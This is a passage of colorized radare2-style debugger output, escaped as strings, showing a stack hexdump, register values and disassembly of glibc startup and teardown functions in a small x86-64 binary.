\u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f670\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f680\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f690\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f6a0\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[37mfc\u001b[0m\u001b[36m7f\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[37mdc\u001b[0m \u001b[33m7c\u001b[0m\u001b[37mdd\u001b[0m \u001b[32m00\u001b[0m\u001b[37m9c\u001b[0m \u001b[33m64\u001b[0m\u001b[33m5a\u001b[0m \u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[36m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33m|\u001b[0m\u001b[37m.\u001b[0m\u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33md\u001b[0m\u001b[33mZ\u001b[0m\n", "\u001b[32m0x7ffcf638f6b0\u001b[0m \u001b[33m30\u001b[0m\u001b[37m06\u001b[0m \u001b[33m40\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[37m97\u001b[0m\u001b[37mcb\u001b[0m \u001b[37me3\u001b[0m\u001b[37mc0\u001b[0m \u001b[33m3b\u001b[0m\u001b[36m7f\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[33m0\u001b[0m\u001b[37m.\u001b[0m\u001b[33m@\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33m;\u001b[0m\u001b[36m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f6c0\u001b[0m \u001b[37m02\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[37m98\u001b[0m\u001b[37mf7\u001b[0m \u001b[33m38\u001b[0m\u001b[37mf6\u001b[0m \u001b[37mfc\u001b[0m\u001b[36m7f\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[37m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33m8\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[36m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f6d0\u001b[0m \u001b[32m00\u001b[0m\u001b[37m80\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[37m02\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[37ma7\u001b[0m\u001b[37m05\u001b[0m \u001b[33m40\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33m@\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f6e0\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[37m03\u001b[0m \u001b[37mf0\u001b[0m\u001b[37m9f\u001b[0m \u001b[33m51\u001b[0m\u001b[37m10\u001b[0m \u001b[37mec\u001b[0m\u001b[33m2b\u001b[0m \u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33mQ\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33m+\u001b[0m\n", "\u001b[32m0x7ffcf638f6f0\u001b[0m \u001b[37mc0\u001b[0m\u001b[37m04\u001b[0m \u001b[33m40\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[37m90\u001b[0m\u001b[37mf7\u001b[0m \u001b[33m38\u001b[0m\u001b[37mf6\u001b[0m \u001b[37mfc\u001b[0m\u001b[36m7f\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33m@\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33m8\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[36m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f700\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f710\u001b[0m \u001b[32m00\u001b[0m\u001b[37m03\u001b[0m \u001b[37m10\u001b[0m\u001b[33m7e\u001b[0m \u001b[37ma0\u001b[0m\u001b[37mfc\u001b[0m \u001b[37m15\u001b[0m\u001b[37md4\u001b[0m \u001b[32m00\u001b[0m\u001b[37m03\u001b[0m \u001b[37m0e\u001b[0m\u001b[37m05\u001b[0m \u001b[37m16\u001b[0m\u001b[37m91\u001b[0m \u001b[37m9b\u001b[0m\u001b[37md5\u001b[0m \u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33m~\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\n", "\n", "\u001b[36mrax = 0x00000000\u001b[0m\n", "rbx = 0x00000000\n", "\u001b[36mrcx = 0x7f3bc0ed28a0\u001b[0m\n", "\u001b[36mrdx = 0x00000000\u001b[0m\n", "\u001b[36mr8 = 0x00000004\u001b[0m\n", "r9 = 0x7f3bc1207d80\n", "\u001b[36mr10 = 0x00000003\u001b[0m\n", "\u001b[36mr11 = 0x7f3bc0fca550\u001b[0m\n", "r12 = 0x004004c0\n", "r13 = 0x7ffcf638f790\n", "r14 = 0x00000000\n", "r15 = 0x00000000\n", "\u001b[36mrsi = 0x00000001\u001b[0m\n", "\u001b[36mrdi = 0x7ffcf638f640\u001b[0m\n", "\u001b[36mrsp = 0x7ffcf638f620\u001b[0m\n", "\u001b[36mrbp = 0x7ffcf638f6b0\u001b[0m\n", "\u001b[36mrip = 0x0040060d\u001b[0m\n", "\u001b[36mrflags = 0x00000203\u001b[0m\n", "orax = 0xffffffffffffffff\n", "\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m;-- \u001b[36mrip:\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[7m\u001b[32m0x0040060d\u001b[0m b \u001b[37me8\u001b[37m9e\u001b[37mfe\u001b[31mff\u001b[31mff\u001b[0m \u001b[1;32mcall sym.imp.printf\u001b[0m\u001b[0m\u001b[31m ; int printf(const char *format)\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400612\u001b[0m \u001b[37mb8\u001b[32m00\u001b[32m00\u001b[32m00\u001b[32m00\u001b[0m \u001b[37mmov\u001b[36m eax\u001b[0m,\u001b[36m\u001b[36m \u001b[33m0\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400617\u001b[0m \u001b[33m48\u001b[37m8b\u001b[33m55\u001b[37mf8\u001b[0m \u001b[37mmov\u001b[36m rdx\u001b[0m,\u001b[36m qword\u001b[36m \u001b[0m[\u001b[36mlocal_8h\u001b[0m]\u001b[36m\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x0040061b\u001b[0m \u001b[33m64\u001b[33m48\u001b[33m33\u001b[37m14\u001b[33m25\u001b[33m28\u001b[37m.\u001b[0m \u001b[36mxor\u001b[36m rdx\u001b[0m,\u001b[36m qword\u001b[36m fs:\u001b[0m[\u001b[36m\u001b[33m0x28\u001b[0m]\u001b[36m\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m ,=< \u001b[0m\u001b[32m0x00400624\u001b[0m \u001b[33m74\u001b[37m05\u001b[0m \u001b[32mje 0x40062b\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m | \u001b[0m\u001b[32m0x00400626\u001b[0m \u001b[37me8\u001b[33m75\u001b[37mfe\u001b[31mff\u001b[31mff\u001b[0m \u001b[1;32mcall sym.imp.__stack_chk_fail\u001b[0m\u001b[0m\u001b[31m ; void __stack_chk_fail(void)\n", "\u001b[36m| \u001b[0m\u001b[36m `-> \u001b[0m\u001b[32m0x0040062b\u001b[0m \u001b[37mc9\u001b[0m \u001b[1;35mleave\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m\\ \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x0040062c\u001b[0m \u001b[37mc3\u001b[0m \u001b[31mret\u001b[0m\u001b[0m\u001b[0m\n", " \u001b[36m \u001b[0m\u001b[32m0x0040062d\u001b[0m \u001b[37m0f\u001b[37m1f\u001b[32m00\u001b[0m \u001b[34mnop dword\u001b[36m \u001b[0m[\u001b[36mrax\u001b[0m]\u001b[36m\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m/ \u001b[0m\u001b[31m(fcn) sym.__libc_csu_init\u001b[0m 101\n", "\u001b[36m| \u001b[0m \u001b[31m sym.__libc_csu_init\u001b[0m ();\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m \u001b[31m; DATA XREF from 0x004004d6 (entry0)\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400630\u001b[0m \u001b[33m41\u001b[33m57\u001b[0m \u001b[35mpush\u001b[36m r15\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400632\u001b[0m \u001b[33m41\u001b[33m56\u001b[0m \u001b[35mpush\u001b[36m r14\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400634\u001b[0m \u001b[33m49\u001b[37m89\u001b[37md7\u001b[0m \u001b[37mmov\u001b[36m r15\u001b[0m,\u001b[36m\u001b[36m rdx\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400637\u001b[0m \u001b[33m41\u001b[33m55\u001b[0m \u001b[35mpush\u001b[36m r13\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400639\u001b[0m \u001b[33m41\u001b[33m54\u001b[0m \u001b[35mpush\u001b[36m r12\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x0040063b\u001b[0m \u001b[33m4c\u001b[37m8d\u001b[33m25\u001b[37mce\u001b[37m07\u001b[33m20\u001b[37m.\u001b[0m \u001b[37mlea\u001b[36m r12\u001b[0m,\u001b[36m qword\u001b[36m \u001b[0m\u001b[33mobj.__frame_dummy_init_array_entry\u001b[0m\u001b[36m\u001b[0m\u001b[0m\u001b[31m ; loc.__init_array_start\u001b[31m ; 0x600e10\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400642\u001b[0m \u001b[33m55\u001b[0m \u001b[35mpush\u001b[36m rbp\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400643\u001b[0m \u001b[33m48\u001b[37m8d\u001b[33m2d\u001b[37mce\u001b[37m07\u001b[33m20\u001b[37m.\u001b[0m \u001b[37mlea\u001b[36m rbp\u001b[0m,\u001b[36m qword\u001b[36m \u001b[0m\u001b[33mobj.__do_global_dtors_aux_fini_array_entry\u001b[0m\u001b[36m\u001b[0m\u001b[0m\u001b[31m ; loc.__init_array_end\u001b[31m ; 0x600e18\u001b[31m ; \"p\\x05@\"\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x0040064a\u001b[0m \u001b[33m53\u001b[0m \u001b[35mpush\u001b[36m rbx\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x0040064b\u001b[0m \u001b[33m41\u001b[37m89\u001b[37mfd\u001b[0m \u001b[37mmov\u001b[36m r13d\u001b[0m,\u001b[36m\u001b[36m edi\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x0040064e\u001b[0m \u001b[33m49\u001b[37m89\u001b[37mf6\u001b[0m \u001b[37mmov\u001b[36m r14\u001b[0m,\u001b[36m\u001b[36m rsi\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400651\u001b[0m \u001b[33m4c\u001b[33m29\u001b[37me5\u001b[0m \u001b[33msub\u001b[36m rbp\u001b[0m,\u001b[36m\u001b[36m r12\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400654\u001b[0m \u001b[33m48\u001b[37m83\u001b[37mec\u001b[37m08\u001b[0m \u001b[33msub\u001b[36m rsp\u001b[0m,\u001b[36m\u001b[36m \u001b[33m8\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400658\u001b[0m \u001b[33m48\u001b[37mc1\u001b[37mfd\u001b[37m03\u001b[0m \u001b[36msar\u001b[36m rbp\u001b[0m,\u001b[36m\u001b[36m \u001b[33m3\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x0040065c\u001b[0m \u001b[37me8\u001b[31mff\u001b[37mfd\u001b[31mff\u001b[31mff\u001b[0m \u001b[1;32mcall sym._init\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400661\u001b[0m \u001b[33m48\u001b[37m85\u001b[37med\u001b[0m \u001b[36mtest\u001b[36m rbp\u001b[0m,\u001b[36m\u001b[36m rbp\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m ,=< \u001b[0m\u001b[32m0x00400664\u001b[0m \u001b[33m74\u001b[33m20\u001b[0m \u001b[32mje 0x400686\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m | \u001b[0m\u001b[32m0x00400666\u001b[0m \u001b[33m31\u001b[37mdb\u001b[0m \u001b[36mxor\u001b[36m ebx\u001b[0m,\u001b[36m\u001b[36m ebx\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m | \u001b[0m\u001b[32m0x00400668\u001b[0m \u001b[37m0f\u001b[37m1f\u001b[37m84\u001b[32m00\u001b[32m00\u001b[32m00\u001b[37m.\u001b[0m \u001b[34mnop dword \u001b[0m[\u001b[36mrax \u001b[0m+\u001b[36m\u001b[36m rax\u001b[0m]\u001b[36m\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m .--> \u001b[0m\u001b[32m0x00400670\u001b[0m \u001b[33m4c\u001b[37m89\u001b[37mfa\u001b[0m \u001b[37mmov\u001b[36m rdx\u001b[0m,\u001b[36m\u001b[36m r15\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[36m:\u001b[36m| \u001b[0m\u001b[32m0x00400673\u001b[0m \u001b[33m4c\u001b[37m89\u001b[37mf6\u001b[0m \u001b[37mmov\u001b[36m rsi\u001b[0m,\u001b[36m\u001b[36m r14\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[36m:\u001b[36m| \u001b[0m\u001b[32m0x00400676\u001b[0m \u001b[33m44\u001b[37m89\u001b[37mef\u001b[0m \u001b[37mmov\u001b[36m edi\u001b[0m,\u001b[36m\u001b[36m r13d\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[36m:\u001b[36m| \u001b[0m\u001b[32m0x00400679\u001b[0m \u001b[33m41\u001b[31mff\u001b[37m14\u001b[37mdc\u001b[0m \u001b[1;32mcall qword [r12 + rbx*8]\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[36m:\u001b[36m| \u001b[0m\u001b[32m0x0040067d\u001b[0m \u001b[33m48\u001b[37m83\u001b[37mc3\u001b[37m01\u001b[0m \u001b[33madd\u001b[36m rbx\u001b[0m,\u001b[36m\u001b[36m \u001b[33m1\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[36m:\u001b[36m| \u001b[0m\u001b[32m0x00400681\u001b[0m \u001b[33m48\u001b[33m39\u001b[37mdd\u001b[0m \u001b[36mcmp\u001b[36m rbp\u001b[0m,\u001b[36m\u001b[36m rbx\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m `==< \u001b[0m\u001b[32m0x00400684\u001b[0m \u001b[33m75\u001b[37mea\u001b[0m \u001b[32mjne 0x400670\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m `-> \u001b[0m\u001b[32m0x00400686\u001b[0m \u001b[33m48\u001b[37m83\u001b[37mc4\u001b[37m08\u001b[0m \u001b[33madd\u001b[36m rsp\u001b[0m,\u001b[36m\u001b[36m \u001b[33m8\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x0040068a\u001b[0m \u001b[33m5b\u001b[0m \u001b[1;35mpop\u001b[36m rbx\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x0040068b\u001b[0m \u001b[33m5d\u001b[0m \u001b[1;35mpop\u001b[36m rbp\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x0040068c\u001b[0m \u001b[33m41\u001b[33m5c\u001b[0m \u001b[1;35mpop\u001b[36m r12\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x0040068e\u001b[0m \u001b[33m41\u001b[33m5d\u001b[0m \u001b[1;35mpop\u001b[36m r13\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400690\u001b[0m \u001b[33m41\u001b[33m5e\u001b[0m \u001b[1;35mpop\u001b[36m r14\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400692\u001b[0m \u001b[33m41\u001b[33m5f\u001b[0m \u001b[1;35mpop\u001b[36m r15\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m\\ \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400694\u001b[0m \u001b[37mc3\u001b[0m \u001b[31mret\u001b[0m\u001b[0m\u001b[0m\n", " \u001b[36m \u001b[0m\u001b[32m0x00400695\u001b[0m \u001b[37m90\u001b[0m \u001b[34mnop\u001b[0m\u001b[0m\u001b[0m\n", " \u001b[36m \u001b[0m\u001b[32m0x00400696\u001b[0m \u001b[33m66\u001b[33m2e\u001b[37m0f\u001b[37m1f\u001b[37m84\u001b[32m00\u001b[37m.\u001b[0m \u001b[34mnop word cs:\u001b[0m[\u001b[36mrax \u001b[0m+\u001b[36m\u001b[36m rax\u001b[0m]\u001b[36m\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m/ \u001b[0m\u001b[31m(fcn) sym.__libc_csu_fini\u001b[0m 2\n", "\u001b[36m| \u001b[0m \u001b[31m sym.__libc_csu_fini\u001b[0m ();\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m \u001b[31m; DATA XREF from 0x004004cf (entry0)\u001b[0m\n", "\u001b[36m\\ \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004006a0\u001b[0m \u001b[37mf3\u001b[37mc3\u001b[0m \u001b[31mret\u001b[0m\u001b[0m\u001b[0m\n", " \u001b[36m \u001b[0m;-- \u001b[36msection_end..text:\u001b[0m\n", " \u001b[36m \u001b[0m\u001b[32m0x004006a2\u001b[0m \u001b[32m00\u001b[32m00\u001b[0m \u001b[33madd byte\u001b[36m \u001b[0m[\u001b[36mrax\u001b[0m]\u001b[36m\u001b[0m,\u001b[36m\u001b[36m al\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m;-- \u001b[36msection..fini:\u001b[0m\n", "\u001b[36m/ \u001b[0m\u001b[31m(fcn) sym._fini\u001b[0m 9\n", "\u001b[36m| \u001b[0m \u001b[31m sym._fini\u001b[0m ();\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004006a4\u001b[0m \u001b[33m48\u001b[37m83\u001b[37mec\u001b[37m08\u001b[0m \u001b[33msub\u001b[36m rsp\u001b[0m,\u001b[36m\u001b[36m \u001b[33m8\u001b[0m\u001b[0m\u001b[0m \u001b[37m; [14] --r-x section size 9 named .fini\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004006a8\u001b[0m \u001b[33m48\u001b[37m83\u001b[37mc4\u001b[37m08\u001b[0m \u001b[33madd\u001b[36m rsp\u001b[0m,\u001b[36m\u001b[36m \u001b[33m8\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m\\ \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004006ac\u001b[0m \u001b[37mc3\u001b[0m \u001b[31mret\u001b[0m\u001b[0m\u001b[0m\n", " \u001b[36m \u001b[0m;-- \u001b[36msection_end..fini:\u001b[0m\n", " \u001b[36m \u001b[0m\u001b[32m0x004006ad\u001b[0m \u001b[32m00\u001b[32m00\u001b[0m \u001b[33madd byte\u001b[36m \u001b[0m[\u001b[36mrax\u001b[0m]\u001b[36m\u001b[0m,\u001b[36m\u001b[36m al\u001b[0m\u001b[0m\u001b[0m\n", " \u001b[36m \u001b[0m\u001b[32m0x004006af\u001b[0m ~ \u001b[32m00\u001b[37m01\u001b[0m \u001b[33madd byte\u001b[36m \u001b[0m[\u001b[36mrcx\u001b[0m]\u001b[36m\u001b[0m,\u001b[36m\u001b[36m al\u001b[0m\u001b[0m\u001b[0m\n", " \u001b[36m \u001b[0m;-- \u001b[36msection..rodata:\u001b[0m\n", " \u001b[36m \u001b[0m;-- \u001b[36m_IO_stdin_used:\u001b[0m\n", " \u001b[36m \u001b[0m\u001b[32m0x004006b0\u001b[0m \u001b[37m01\u001b[32m00\u001b[0m \u001b[33madd dword\u001b[36m \u001b[0m[\u001b[36mrax\u001b[0m]\u001b[36m\u001b[0m,\u001b[36m\u001b[36m 